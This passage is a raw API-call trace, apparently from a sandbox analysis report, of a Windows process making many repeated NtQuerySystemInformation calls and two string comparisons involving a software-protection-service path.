SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0269.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0269.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x20, ResultLength=0x0) [0269.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0269.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0269.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0269.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0269.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0269.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0269.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0269.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0269.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0269.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0269.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0269.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0269.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0269.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca10, Length=0x28, ResultLength=0x0) [0269.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0269.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca90, Length=0x28, ResultLength=0x0) [0269.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca90, Length=0x28, ResultLength=0x0) [0269.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0269.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x20, ResultLength=0x0) [0269.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0269.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0269.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0269.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0269.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x20, ResultLength=0x0) [0269.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0269.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0269.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0269.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0269.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0269.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0269.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0269.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0269.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0269.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0269.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0269.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0269.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0269.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca10, Length=0x28, ResultLength=0x0) [0269.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0269.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca90, Length=0x28, ResultLength=0x0) [0269.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca90, Length=0x28, ResultLength=0x0) [0269.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0269.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x20, ResultLength=0x0) [0269.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0269.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0269.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0269.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0269.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x20, ResultLength=0x0) [0269.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0269.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0269.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x50, ResultLength=0x0) [0269.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd80, Length=0x28, ResultLength=0x0) [0269.202] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x50, ResultLength=0x0) [0269.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x50, ResultLength=0x0) [0269.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x50, ResultLength=0x0) [0269.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x38, ResultLength=0x0) [0269.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb60, Length=0x28, ResultLength=0x0) [0269.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb60, Length=0x28, ResultLength=0x0) [0269.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb60, Length=0x28, ResultLength=0x0) [0269.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x28, ResultLength=0x0) [0269.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x38, ResultLength=0x0) [0269.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x28, ResultLength=0x0) [0269.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x28, ResultLength=0x0) [0269.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x38, ResultLength=0x0) [0269.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x20, ResultLength=0x0) [0269.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb30, Length=0x20, ResultLength=0x0) [0269.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb30, Length=0x20, ResultLength=0x0) [0269.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb30, Length=0x20, ResultLength=0x0) [0269.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x38, ResultLength=0x0) [0269.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbb0, Length=0x20, ResultLength=0x0) [0269.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb40, Length=0x20, ResultLength=0x0) [0269.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb40, Length=0x20, ResultLength=0x0) [0269.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x50, ResultLength=0x0) [0269.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd80, Length=0x28, ResultLength=0x0) [0269.212] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x50, ResultLength=0x0) [0269.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x50, ResultLength=0x0) [0269.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x50, ResultLength=0x0) [0269.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x38, ResultLength=0x0) [0269.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb60, Length=0x28, ResultLength=0x0) [0269.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb60, Length=0x28, ResultLength=0x0) [0269.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb60, Length=0x28, ResultLength=0x0) [0269.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbd0, Length=0x28, ResultLength=0x0) [0269.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x38, ResultLength=0x0) [0269.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x28, ResultLength=0x0) [0269.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 